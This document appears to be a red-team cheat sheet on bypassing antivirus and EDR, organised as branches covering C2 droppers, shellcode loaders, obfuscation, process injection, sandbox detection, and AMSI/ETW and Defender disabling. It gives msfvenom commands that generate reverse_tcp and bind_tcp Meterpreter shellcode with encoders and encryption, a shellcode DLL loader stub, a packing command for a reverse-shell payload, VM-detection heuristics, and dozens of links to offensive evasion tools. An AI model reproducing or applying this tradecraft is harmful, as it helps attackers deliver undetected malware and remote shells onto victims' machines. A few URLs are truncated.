Bypass AV/EDR

Main branches: Dropper, Manual loader, Automatic loader, Generate shellcode, Manual obfuscation, Automatic obfuscation, Process injection, Detect virtual machines (Sandbox), From PE to shellcode, From alive beacon, Extensions.

Dropper / C2
- Description
- C2 (Cobalt/Havoc, whatever)
- C2 by DNS
- Network P2P (hide the IP of the C2)
- HTTPS

From alive beacon
- Havoc: dotnet (object file)
- Cobalt: BoF (Beacon object file), https://github.com/trustedsec/CS-Situational-Awareness-BOF
- From .NET to BoF: https://github.com/CCob/BOF.NET

Manual loader
- Steps: 1. allocate memory; 2. move the shellcode into that memory; 3. execute the shellcode.
- Loading a shellcode DLL (code as given on the page, made compilable):

    #include <iostream>
    #include <Windows.h>

    int main(void) {
        HMODULE hMod = LoadLibraryA("shellcode.dll");
        if (hMod == nullptr) {
            std::cout << "Failed to load shellcode.dll" << std::endl;
        }
        return 0;
    }

- RWX: you set your region to RW, write your shellcode, then reprotect it to RX, then run the thread. This way the region is never RWX.
- Loaders by language:
  - python: https://github.com/icyguider/Shhhloader
  - C: https://github.com/fancycode/MemoryModule, https://github.com/cribdragg3r/Alaris, https://github.com/trustedsec/COFFLoader, https://github.com/reveng007/ReflectiveNtdll, TheWover/DInvoke, https://github.com/monoxgas/sRDI
  - C++: https://blog.securityevaluators.com/creating-av-resistant-malware-part-1-7604b83ea0c0
  - C++ / ASM: https://nytrosecurity.com/2019/06/30/writing-shellcodes-for-windows-x64/
  - Nim: https://github.com/aeverj/NimShellCodeLoader, https://github.com/sh3d0ww01f/nim_shellloader
  - Go: https://github.com/EddieIvan01/gld, https://github.com/zha0gongz1/DesertFox
  - Rust: https://github.com/b1tg/rs_shellcode, https://github.com/r4ime/shellcode_loader, https://github.com/cr7pt0pl4gu3/Pestilence
  - Crystal
  - https://github.com/ReversingID/Shellcode-Loader/tree/master/windows

Automatic loader
- https://github.com/TheD1rkMtr/D1rkLrd
- https://github.com/xuanxuan0/DripLoader
- https://github.com/Hagrid29/PELoaderBypass
- https://github.com/CMEPW/Selha/blob/main/C/aes-loader-stageless.c
- https://github.com/optiv/ScareCrow, e.g. ScareCrow -I /Path/To/ShellCode -d facebook.com
- https://github.com/phra/PEzor
- https://github.com/klezVirus/inceptor
- https://github.com/optiv/Ivy
- https://github.com/DavidBuchanan314/monomorph
- https://github.com/S4ntiagoP/donut/tree/syscalls
- Packing: https://github.com/upx/upx, https://github.com/govolution/avet, https://github.com/Nariod/RustPacker, Hyperion (wine hyperion.exe /root/payloads/shellter/shellter_putty_reverse_x86.exe)
- https://github.com/EgeBalci/sgn/

Generate shellcode
- msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<SERVER> LPORT=<PORT> -f raw
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f dll
- msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 30 RHOST=10.0.0.68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more
- Staged and stageless: by definition, when we talk about staged we are referring to a payload in addition to a piece. This means that there will be several actions (often 2) between the client and the server. If you use meterpreter, please use the following commands:
    set EnableStageEncoding true;
    set StageEncoder x64/xor_dynamic;
- https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
- https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/
- https://www.purpl3f0xsecur1ty.tech/2021/03/30/av_evasion.html

From PE to shellcode
- https://github.com/hasherezade/pe_to_shellcode
- C: https://vxug.fakedoma.in/papers/VXUG/Exclusive/FromaCprojectthroughassemblytoshellcodeHasherezade.pdf

Manual obfuscation
- Pro tip: shellcode passed through 3 open-source packers has a higher chance of being caught than manually obfuscated shellcode.
- Signature hiding:
  - Templates: https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates
  - Change logo/icon: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/resources?redirectedfrom=MSDN
  - https://github.com/paranoidninja/CarbonCopy
  - Entropy: https://github.com/kleiton0x00/Shelltropy
- Static:
  - ROP
  - CFG: https://improsec.com/tech-blog/bypassing-control-flow-guard-on-windows-10-part-ii, https://joshpitts.medium.com/hooking-control-flow-guard-cfg-for-fun-and-profit-31f951485545
  - CFG flattening: http://ac.inf.elte.hu/Vol_030_2009/003.pdf, https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=ade1cc22ee994c1b353326ae4cedccd29f33b8d0
- LOLBIN RemComSvc: https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb

Automatic obfuscation
- .NET: https://github.com/danielbohannon/Invoke-Obfuscation
- https://github.com/klezVirus/Chameleon
- https://github.com/tokyoneon/Chimera

Process injection
- Thread execution hijacking: https://attack.mitre.org/techniques/T1055/003/
- APC (Asynchronous Procedure Call): https://subscription.packtpub.com/book/security/9781789610789/8/ch08lvl1sec50/executing-the-inject-code-using-apc-queuing, https://github.com/LloydLabs/ntqueueapcthreadex-ntdll-gadget-injection
- User APC
- Process hollowing: https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations#relocation
- Process Doppelganging: https://thehackernews.com/2017/12/malware-process-doppelganging.html
- Reflective DLL injection: https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html
- DLL injection: https://www.ired.team/offensive-security/code-injection-process-injection/dll-injection
- DLL Sideloading & Proxying: https://book.hacktricks.xyz/windows-hardening/windows-av-bypass#dll-sideloading-and-proxying
- Remote thread: https://sevrosecurity.com/2020/04/08/process-injection-part-1-createremotethread/
- Direct syscalls: https://medium.com/@merasor07/av-edr-evasion-using-direct-system-calls-user-mode-vs-kernel-mode-fad2fdfed01a, https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/, https://www.cyberbit.com/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/, https://thewover.github.io/Dynamic-Invoke/, https://github.com/klezVirus/SysWhispers3, https://github.com/jthuraisamy/SysWhispers2
- PSC (Ptrace System Calls)
- COM: https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/
- COM Hijack Dll: https://0xpat.github.io/Abusing_COM_Objects/
- Foliage
- Delayed execution: https://evasions.checkpoint.com/techniques/timing.html#delayed-execution
  - WaitForSingleObjectEx
  - Ekko: a small sleep obfuscation technique that uses the CreateTimerQueueTimer Win32 API
  - DeathSleep: https://github.com/janoglezcampos/DeathSleep

Detect virtual machines (Sandbox)
- Count the number of processes; if it is >= 40, it is probably not a VM
- User interaction: send a MessageBoxW
- Software
- Check for internet
- Datetime on compilation
- Check the computer name: VM = DESKTOP-[0-9A-Z]{7}
- CPUID timing
- Hardware: a typical user workstation has a processor with at least 2 cores, a minimum of 2 GB of RAM and a 100 GB hard drive
- OSX: https://evasions.checkpoint.com/techniques/macos.html#macos-sandbox-methods
- Tools: https://github.com/a0rtega/pafish, https://github.com/CMEPW/bof-collection/blob/main/src/checkVM/checkVM2.c

Extensions
- Exe, Hta, Cpl, Dll
- Office macro: https://github.com/sevagas/macro_pack

AMSI / ETW / AV
- Static AMSI Bypass
- https://rastamouse.me/memory-patching-amsi-bypass/
- https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
- https://github.com/CCob/SharpBlock
- Disable ETW: https://github.com/Soledge/BlockEtw, https://github.com/CCob/SharpBlock
- Disable AV: https://github.com/APTortellini/unDefender

Other references
- https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/
- https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32
- sec.co.uk/2018/06/exploring-[…]-and-logging-evasion/ (URL truncated in the source)
- dsec.co.uk/2020/03/hiding- (URL truncated in the source)

Credits: @Jenaye_fr, LeDocteurDesBits, michmich1000, @Zabannn